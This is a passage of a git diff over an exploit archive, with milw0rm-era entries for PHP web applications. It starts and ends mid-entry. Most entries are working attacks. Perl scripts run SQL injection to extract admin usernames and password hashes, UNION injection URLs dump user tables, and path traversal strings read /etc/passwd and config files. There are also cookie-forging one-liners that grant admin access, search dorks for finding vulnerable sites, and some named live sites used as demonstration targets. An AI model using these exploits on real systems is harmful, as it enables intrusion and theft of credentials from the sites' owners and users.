    " . mysql_error()); + +<> + +use HTTP::Request; +use LWP::UserAgent; + +my $web="http://localhost/hits.php?sortby=1'"; +my $ua=LWP::UserAgent->new(); +my $respuesta=HTTP::Request->new(GET=>$web); +$ua->timeout(30); +my $response=$ua->request($respuesta); +$contenido=$response->content; +if ($response->is_success) +{ +if($contenido =~ /You have an error in your SQL syntax;/) +{ +print "\n[+] Exploit Succesful!\n"; +print "\n[+] Content:\n"; +print "$contenido\n\n"; +} +} +else +{ +print "\n[-] Exploit Failed!\n\n"; +} + +# milw0rm.com [2008-10-15] diff --git a/platforms/php/webapps/6760.txt b/platforms/php/webapps/6760.txt index 2e380afae..4fdf5f762 100755 --- a/platforms/php/webapps/6760.txt +++ b/platforms/php/webapps/6760.txt @@ -1,27 +1,27 @@ -# myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability -# url: http://mywebland.com/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: All Hackers and milw0rm website - -vuln file: /viewevent.php -vuln code: -43: if (isset($_GET['eventdate'])) -xx: ... -93: $sql = "SELECT * FROM event WHERE date = '$eventdate'" ; - -94: $results = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error()); - -95: $event = mysql_num_rows($results); - -PoC: /viewevent.php?eventdate='[foo] -Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/* - -# milw0rm.com [2008-10-15] +# myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability +# url: http://mywebland.com/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: All Hackers and milw0rm website + +vuln file: /viewevent.php +vuln code: +43: if (isset($_GET['eventdate'])) +xx: ... +93: $sql = "SELECT * FROM event WHERE date = '$eventdate'" ; + +94: $results = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error()); + +95: $event = mysql_num_rows($results); + +PoC: /viewevent.php?eventdate='[foo] +Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/* + +# milw0rm.com [2008-10-15] diff --git a/platforms/php/webapps/6762.txt b/platforms/php/webapps/6762.txt index 750f87abf..619ce1e55 100755 --- a/platforms/php/webapps/6762.txt +++ b/platforms/php/webapps/6762.txt 
@@ -1,50 +1,50 @@ - ___________________________________________________________________________________________________________ - | _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ | - | | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ | - | | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / | - | | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / | - | | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ | - | | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ | - | | / \/ | - | | / _____________________________________________________________________________________________________| - | | / / .: CafeEngine Multipe remote SQL Injection :. | - | |/ /______________________________________________________________________________________________________| - | v / Discoverd By: 0xFFFFFF . Main THX: ALLAH | - | / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team | - | / Mail: admin(at)white-hacker[dot]com . | - |/ Country: Algeria . | - v___________________________________________________________________________________________________________| - | Publication info :. | - |___________________________________________________________________________________________________________| - | Date: 19-09-2008 . Method : [*] GET [ ] POST | - | Content: Vulnerability . Register Globals : [ ] ON [*] OFF | - | Type: SQL injection . Magic quotes : [*] ON [ ] OFF | - | Application: Easy-Cafeengine / Cafeengine . Risk: [*] High [ ] medium [ ] Low | - | Venedor site: http://cafeengine.com/ . | - | Version: N/A . | - | Impact: Exploring Database . | - | Exploit: Available . | - | Fix: N/A . | - |___________________________________________________________________________________________________________| - | Description :. 
| - |___________________________________________________________________________________________________________| - | Input "id" passed into dish.php,menu.php pages is not properly verified, | - | a visitor can easily get sensitive information from the database by injecting SQL Querys | - | ......................................................................................................... | - | | - | CafeEngine Exploit : | - | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10 | - | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 | - | | - | Easy-CafeEngine Exploit: | - | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9 | - |___________________________________________________________________________________________________________| - | Notice :. | - |___________________________________________________________________________________________________________| - | These publications are published for educational purpose thus the author will be not responsible | - | for any damage. | - |___________________________________________________________________________________________________________| - \ © WHITE-HACKER All contents © 2008. All rights reserved. 
| - \____________________________________________________________| - -# milw0rm.com [2008-10-16] + ___________________________________________________________________________________________________________ + | _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ | + | | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ | + | | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / | + | | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / | + | | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ | + | | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ | + | | / \/ | + | | / _____________________________________________________________________________________________________| + | | / / .: CafeEngine Multipe remote SQL Injection :. | + | |/ /______________________________________________________________________________________________________| + | v / Discoverd By: 0xFFFFFF . Main THX: ALLAH | + | / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team | + | / Mail: admin(at)white-hacker[dot]com . | + |/ Country: Algeria . | + v___________________________________________________________________________________________________________| + | Publication info :. | + |___________________________________________________________________________________________________________| + | Date: 19-09-2008 . Method : [*] GET [ ] POST | + | Content: Vulnerability . Register Globals : [ ] ON [*] OFF | + | Type: SQL injection . Magic quotes : [*] ON [ ] OFF | + | Application: Easy-Cafeengine / Cafeengine . Risk: [*] High [ ] medium [ ] Low | + | Venedor site: http://cafeengine.com/ . | + | Version: N/A . | + | Impact: Exploring Database . | + | Exploit: Available . | + | Fix: N/A . | + |___________________________________________________________________________________________________________| + | Description :. 
| + |___________________________________________________________________________________________________________| + | Input "id" passed into dish.php,menu.php pages is not properly verified, | + | a visitor can easily get sensitive information from the database by injecting SQL Querys | + | ......................................................................................................... | + | | + | CafeEngine Exploit : | + | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10 | + | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 | + | | + | Easy-CafeEngine Exploit: | + | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9 | + |___________________________________________________________________________________________________________| + | Notice :. | + |___________________________________________________________________________________________________________| + | These publications are published for educational purpose thus the author will be not responsible | + | for any damage. | + |___________________________________________________________________________________________________________| + \ © WHITE-HACKER All contents © 2008. All rights reserved. | + \____________________________________________________________| + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6763.txt b/platforms/php/webapps/6763.txt index f71dc310f..0776f1ff9 100755 --- a/platforms/php/webapps/6763.txt +++ b/platforms/php/webapps/6763.txt 
@@ -1,21 +1,21 @@ - Mosaic Commerce SQL Injection Vulnerability -Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir] -Mazandaran University Of Science And Technology -Network Security Research Center -Babol, Iran -http://cyber-defence.com -Greetz For All Persian Bugtraq Members ( www.bugtraq.ir ) - - - {SQL BUG} - /mosaic-path/category.php?cid=[SQL] - - Exploit For Get Admin Username And Password Hash: - category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/* - - -Example: - -http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/* - -# milw0rm.com [2008-10-16] + Mosaic Commerce SQL Injection Vulnerability +Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir] +Mazandaran University Of Science And Technology +Network Security Research Center +Babol, Iran +http://cyber-defence.com +Greetz For All Persian Bugtraq Members ( www.bugtraq.ir ) + + + {SQL BUG} + /mosaic-path/category.php?cid=[SQL] + + Exploit For Get Admin Username And Password Hash: + category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/* + + +Example: + +http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/* + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6764.php b/platforms/php/webapps/6764.php index 4694054d5..aaad6eb91 100755 --- a/platforms/php/webapps/6764.php +++ b/platforms/php/webapps/6764.php @@ -1,247 +1,247 @@ -#!/usr/bin/php -q - - -# milw0rm.com [2008-10-16] +#!/usr/bin/php -q + + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6765.txt b/platforms/php/webapps/6765.txt index 114a7fc2e..4cc8ddd61 100755 --- a/platforms/php/webapps/6765.txt +++ b/platforms/php/webapps/6765.txt 
@@ -1,61 +1,61 @@ -# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities -# url: http://sourceforge.net/projects/ipreg/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: All Hackers and milw0rm website - -------------------------- - -vuln file: /locationdel.php -vuln code: -27: $location_id = $_GET['location_id']; -xx: ... -42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error()); - -PoC: /locationdel.php?location_id='[foo] -Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/* - -------------------------- - -vuln file: /vlanview.php -vuln code: -27: $vlan_id = $_GET['vlan_id']; -xx: ... -42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error - ()); - -PoC: /vlanview.php?vlan_id='[foo] -Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* - -------------------------- - -vuln file: /vlanedit.php -vuln code: -27: $vlan_id = $_GET['vlan_id']; -xx: ... -42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error - ()); - -PoC: /vlanedit.php?vlan_id='[foo] -Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* - -------------------------- - -vuln file: /vlandel.php -vuln code: -27: $vlan_id = $_GET['vlan_id']; -xx: ... 
-42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error - ()); - -PoC: /vlandel.php?vlan_id='[foo] -Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* - -# milw0rm.com [2008-10-16] +# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities +# url: http://sourceforge.net/projects/ipreg/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: All Hackers and milw0rm website + +------------------------- + +vuln file: /locationdel.php +vuln code: +27: $location_id = $_GET['location_id']; +xx: ... +42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error()); + +PoC: /locationdel.php?location_id='[foo] +Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/* + +------------------------- + +vuln file: /vlanview.php +vuln code: +27: $vlan_id = $_GET['vlan_id']; +xx: ... +42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error + ()); + +PoC: /vlanview.php?vlan_id='[foo] +Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* + +------------------------- + +vuln file: /vlanedit.php +vuln code: +27: $vlan_id = $_GET['vlan_id']; +xx: ... +42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error + ()); + +PoC: /vlanedit.php?vlan_id='[foo] +Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* + +------------------------- + +vuln file: /vlandel.php +vuln code: +27: $vlan_id = $_GET['vlan_id']; +xx: ... 
+42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error + ()); + +PoC: /vlandel.php?vlan_id='[foo] +Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6766.txt b/platforms/php/webapps/6766.txt index c03d52ac0..76651c879 100755 --- a/platforms/php/webapps/6766.txt +++ b/platforms/php/webapps/6766.txt 
@@ -1,45 +1,45 @@ -************************************************************************************** - -Author : DaRkLiFe -Greetz : str0ke & S.W.A.T. & funkys0ul - -************************************************************************************** -Script : - -PokerMax Poker League Insecure Cookie Handling Vulnerability - -Download: - -http://www.stevedawson.com/downloads/pokerleague.zip -************************************************************************************** - -Exploit : - -javascript:document.cookie = "ValidUserAdmin=admin"; - -**here "admin" refers to username of administrator on site - -default username is "admin" given after installation of site - -but if it is changed u can easily find out username of admin and then -substitute it in place of "admin" -************************************************************************************** - -Instructions : - -Find the site running on this script . - -Go to http://site.com/pokerleague/pokeradmin/configure.php - -It will ask for login. Now in url tab run the exploit command - -Then return back to http://site.com/pokerleague/pokeradmin/configure.php - -Now u should be loggedin as admin and change the thing into what you want . - -************************************************************************************** - -THANKS ! GREETZ ! HAPPY DIWALI ! -************************************************************************************** - -# milw0rm.com [2008-10-16] +************************************************************************************** + +Author : DaRkLiFe +Greetz : str0ke & S.W.A.T. 
& funkys0ul + +************************************************************************************** +Script : + +PokerMax Poker League Insecure Cookie Handling Vulnerability + +Download: + +http://www.stevedawson.com/downloads/pokerleague.zip +************************************************************************************** + +Exploit : + +javascript:document.cookie = "ValidUserAdmin=admin"; + +**here "admin" refers to username of administrator on site + +default username is "admin" given after installation of site + +but if it is changed u can easily find out username of admin and then +substitute it in place of "admin" +************************************************************************************** + +Instructions : + +Find the site running on this script . + +Go to http://site.com/pokerleague/pokeradmin/configure.php + +It will ask for login. Now in url tab run the exploit command + +Then return back to http://site.com/pokerleague/pokeradmin/configure.php + +Now u should be loggedin as admin and change the thing into what you want . + +************************************************************************************** + +THANKS ! GREETZ ! HAPPY DIWALI ! +************************************************************************************** + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6767.txt b/platforms/php/webapps/6767.txt index 6fa203f22..1fc24fd28 100755 --- a/platforms/php/webapps/6767.txt +++ b/platforms/php/webapps/6767.txt 
@@ -1,26 +1,26 @@ -# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability -# url: http://code.google.com/p/kure/downloads/list -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# *Requirements: magic_quotes_gpc = Off - -LFI /etc/passwd: -/?post=../../../../../../../../../../../../../etc/passwd%00 -/?doc=../../../../../../../../../../../../../etc/passwd%00 - -LFI /config.php: -/?post=../config.php%00 -/?doc=../config.php%00 - -dork: "powered by kure" - -have fun :D - -# milw0rm.com [2008-10-16] +# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability +# url: http://code.google.com/p/kure/downloads/list +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# *Requirements: magic_quotes_gpc = Off + +LFI /etc/passwd: +/?post=../../../../../../../../../../../../../etc/passwd%00 +/?doc=../../../../../../../../../../../../../etc/passwd%00 + +LFI /config.php: +/?post=../config.php%00 +/?doc=../config.php%00 + +dork: "powered by kure" + +have fun :D + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6768.txt b/platforms/php/webapps/6768.txt index 212bb6101..0be4dc4c3 100755 --- a/platforms/php/webapps/6768.txt +++ b/platforms/php/webapps/6768.txt @@ -1,136 +1,136 @@ - - -# milw0rm.com [2008-10-16] + + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6769.pl b/platforms/php/webapps/6769.pl index 86ec8fc22..0aee7f5b5 100755 --- a/platforms/php/webapps/6769.pl +++ b/platforms/php/webapps/6769.pl 
@@ -1,60 +1,60 @@ -#!/usr/bin/perl -# ----------------------------------------------------- -# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit -# By StAkeR aka athos - StAkeR[at]hotmail[dot]it -# On 16/10/2008 -# http://www.igamingcms.com/iGaming_2_Alpha.zip -# ----------------------------------------------------- - -use strict; -use LWP::UserAgent; - - -my ($host,$id) = @ARGV; - -usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/; - -my $etc = "' union select 1,concat(0x616E6172636879,". - "password,0x3a,username,0x616E6172636879),3". - ",4,5 from sp_users where id=$id#"; - -my @search = ($etc,'all',0,'Search','search_games'); -my @split = undef; - -my $http = new LWP::UserAgent; -my $post = $http->post($host.'/search.php', - [ - keywords => $search[0], - platform => $search[1], - exact => $search[2], - submit => $search[3], - do => $search[4] - ]); - -if($post->is_success) -{ - if($post->as_string =~ /anarchy(.+?)anarchy/) - { - @split = split(':',$1); - - print "Username: $split[0]\r\n"; - print "Password: $split[1]\r\n"; - } - else - { - print "Exploit Failed!\r\n"; - } -} - -sub usage -{ - print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n"; - print "Usage: perl $0 http://[host] [user_id]\r\n"; - exit; -} - - - -__END__ - -# milw0rm.com [2008-10-16] +#!/usr/bin/perl +# ----------------------------------------------------- +# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit +# By StAkeR aka athos - StAkeR[at]hotmail[dot]it +# On 16/10/2008 +# http://www.igamingcms.com/iGaming_2_Alpha.zip +# ----------------------------------------------------- + +use strict; +use LWP::UserAgent; + + +my ($host,$id) = @ARGV; + +usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/; + +my $etc = "' union select 1,concat(0x616E6172636879,". + "password,0x3a,username,0x616E6172636879),3". 
+ ",4,5 from sp_users where id=$id#"; + +my @search = ($etc,'all',0,'Search','search_games'); +my @split = undef; + +my $http = new LWP::UserAgent; +my $post = $http->post($host.'/search.php', + [ + keywords => $search[0], + platform => $search[1], + exact => $search[2], + submit => $search[3], + do => $search[4] + ]); + +if($post->is_success) +{ + if($post->as_string =~ /anarchy(.+?)anarchy/) + { + @split = split(':',$1); + + print "Username: $split[0]\r\n"; + print "Password: $split[1]\r\n"; + } + else + { + print "Exploit Failed!\r\n"; + } +} + +sub usage +{ + print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n"; + print "Usage: perl $0 http://[host] [user_id]\r\n"; + exit; +} + + + +__END__ + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6770.txt b/platforms/php/webapps/6770.txt index b4e42ceec..62b05930e 100755 --- a/platforms/php/webapps/6770.txt +++ b/platforms/php/webapps/6770.txt @@ -1,17 +1,17 @@ -::::::::::::::::::::R3AL.RU:::::::::::::::::::: - -PHP Easy Downloader <= 1.5 Remote File Download - -Author: LMaster - -Greetz: Pogozheva Irina Borisovna and r3al.ru - -Download: - -http://www.hasemithut.de/downloads/index.php - -Exploit: - -http://www.target.com/phpeasydownloader/index.php?file=index.php - -# milw0rm.com [2008-10-16] +::::::::::::::::::::R3AL.RU:::::::::::::::::::: + +PHP Easy Downloader <= 1.5 Remote File Download + +Author: LMaster + +Greetz: Pogozheva Irina Borisovna and r3al.ru + +Download: + +http://www.hasemithut.de/downloads/index.php + +Exploit: + +http://www.target.com/phpeasydownloader/index.php?file=index.php + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6772.txt b/platforms/php/webapps/6772.txt index 2ce30dd6c..877ce9e61 100755 --- a/platforms/php/webapps/6772.txt +++ b/platforms/php/webapps/6772.txt 
@@ -1,31 +1,31 @@ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -Software : Post Affiliate Pro v2.0 -Vulnrability : Local File Inclusion -Severity : High - -Author : ZeN -Date : 16 October 2008 - -Websites > -http://DUSecurity.com -http://DarkCode.me - -PS : You MUST be logged into the system for the exploit to work. - -Exploit > - -http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00 - - -Shouts> -DUSecurity Group -DarkCode -WL-Group -IWannaHack -Milw0rm -EnigmaGroup - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -# milw0rm.com [2008-10-16] +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +Software : Post Affiliate Pro v2.0 +Vulnrability : Local File Inclusion +Severity : High + +Author : ZeN +Date : 16 October 2008 + +Websites > +http://DUSecurity.com +http://DarkCode.me + +PS : You MUST be logged into the system for the exploit to work. + +Exploit > + +http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00 + + +Shouts> +DUSecurity Group +DarkCode +WL-Group +IWannaHack +Milw0rm +EnigmaGroup + +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +# milw0rm.com [2008-10-16] diff --git a/platforms/php/webapps/6777.txt b/platforms/php/webapps/6777.txt index 2df2d0890..dd0f1963e 100755 --- a/platforms/php/webapps/6777.txt +++ b/platforms/php/webapps/6777.txt 
@@ -1,52 +1,52 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # -# and all darkc0de and DarkTrix members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com & darktrix.info -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: WordPress stnl_iframe remote sql injection vulnerability -# -# -########################################################### -# -# d0rk: ''stnl_iframe'' -# -########################################################### - - POC :- - - wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- - - Live Demo: - - http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- - - -########################################################### -# -# Bug discovered : 18 Oct 2008 -########################################################### - -# milw0rm.com [2008-10-17] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ 
\ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # +# and all darkc0de and DarkTrix members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com & darktrix.info +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: WordPress stnl_iframe remote sql injection vulnerability +# +# +########################################################### +# +# d0rk: ''stnl_iframe'' +# +########################################################### + + POC :- + + wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- + + Live Demo: + + http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- + + +########################################################### +# +# Bug discovered : 18 Oct 2008 +########################################################### + +# milw0rm.com [2008-10-17] diff --git a/platforms/php/webapps/6778.pl b/platforms/php/webapps/6778.pl index 9f22dd2a1..ab6fcd242 100755 --- a/platforms/php/webapps/6778.pl +++ b/platforms/php/webapps/6778.pl 
@@ -1,45 +1,45 @@ -#!/usr/bin/perl -w - - -#Xoops GesGaleri Sql injection# -######################################## -#[~] Author : EcHoLL -#[~] www.warezturk.org www.tahribat.com -#[~] Greetz : Black_label TURK Godlike - -#[!] Module_Name: GesGaleri -#[!] Script_Name: XOOPS -#[!] Google_Dork: inurl:"/modules/GesGaleri/" -######################################## - - -system("color FF0000"); -system("Nohacking"); -print "\t\t-------------------------------------------------------------\n\n"; -print "\t\t| Turkish Securtiy Team |\n\n"; -print "\t\t-------------------------------------------------------------\n\n"; -print "\t\t|XOOPS Module GesGaleri(index.php kategorino)Remote SQL Injection Vuln|\n\n"; -print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n"; -print "\t\t-------------------------------------------------------------\n\n"; - -use LWP::UserAgent; - -print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; - chomp(my $target=); - -$column_name="concat(uname,0x3a,pass)"; -$table_name="xoops_users"; - -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - -$host = $target . "/modules/GesGaleri/index.php?kategorino=5&no=15+union+select+1,2,".$column_name."+from/**/".$table_name."--"; -$res = $b->request(HTTP::Request->new(GET=>$host)); -$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ - print "\n[+] Admin Hash : $1\n\n"; - print "# Tebrikler Exploit Calisti! #\n\n"; -} -else{print "\n[-] Exploit Bulunamadı...\n"; -} - -# milw0rm.com [2008-10-18] +#!/usr/bin/perl -w + + +#Xoops GesGaleri Sql injection# +######################################## +#[~] Author : EcHoLL +#[~] www.warezturk.org www.tahribat.com +#[~] Greetz : Black_label TURK Godlike + +#[!] Module_Name: GesGaleri +#[!] Script_Name: XOOPS +#[!] 
Google_Dork: inurl:"/modules/GesGaleri/" +######################################## + + +system("color FF0000"); +system("Nohacking"); +print "\t\t-------------------------------------------------------------\n\n"; +print "\t\t| Turkish Securtiy Team |\n\n"; +print "\t\t-------------------------------------------------------------\n\n"; +print "\t\t|XOOPS Module GesGaleri(index.php kategorino)Remote SQL Injection Vuln|\n\n"; +print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n"; +print "\t\t-------------------------------------------------------------\n\n"; + +use LWP::UserAgent; + +print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; + chomp(my $target=); + +$column_name="concat(uname,0x3a,pass)"; +$table_name="xoops_users"; + +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + +$host = $target . "/modules/GesGaleri/index.php?kategorino=5&no=15+union+select+1,2,".$column_name."+from/**/".$table_name."--"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ + print "\n[+] Admin Hash : $1\n\n"; + print "# Tebrikler Exploit Calisti! #\n\n"; +} +else{print "\n[-] Exploit Bulunamadı...\n"; +} + +# milw0rm.com [2008-10-18] diff --git a/platforms/php/webapps/6779.txt b/platforms/php/webapps/6779.txt index d2cca5cb6..a23b69a07 100755 --- a/platforms/php/webapps/6779.txt +++ b/platforms/php/webapps/6779.txt 
@@ -1,21 +1,21 @@ -################################################# -## Qabandi iqa[at]hotmail.fr ## -## from Kuwait ## -################################################# -\\ phpFastNews -// Insecure cookie handling -\\ -// Go to any website that has the script installed -\\ type the following code into the Adress Bar -// -\\ javascript:document.cookie = "fn-loggedin = 1"; -// -\\ Refresh do whatever, and you will be logged in -// -\\ Dork:intext:"Powered by phpFastNews" -################################################# -## Greetz: Killer Hack, Str0ke ## -################################################# - PEACE - -# milw0rm.com [2008-10-18] +################################################# +## Qabandi iqa[at]hotmail.fr ## +## from Kuwait ## +################################################# +\\ phpFastNews +// Insecure cookie handling +\\ +// Go to any website that has the script installed +\\ type the following code into the Adress Bar +// +\\ javascript:document.cookie = "fn-loggedin = 1"; +// +\\ Refresh do whatever, and you will be logged in +// +\\ Dork:intext:"Powered by phpFastNews" +################################################# +## Greetz: Killer Hack, Str0ke ## +################################################# + PEACE + +# milw0rm.com 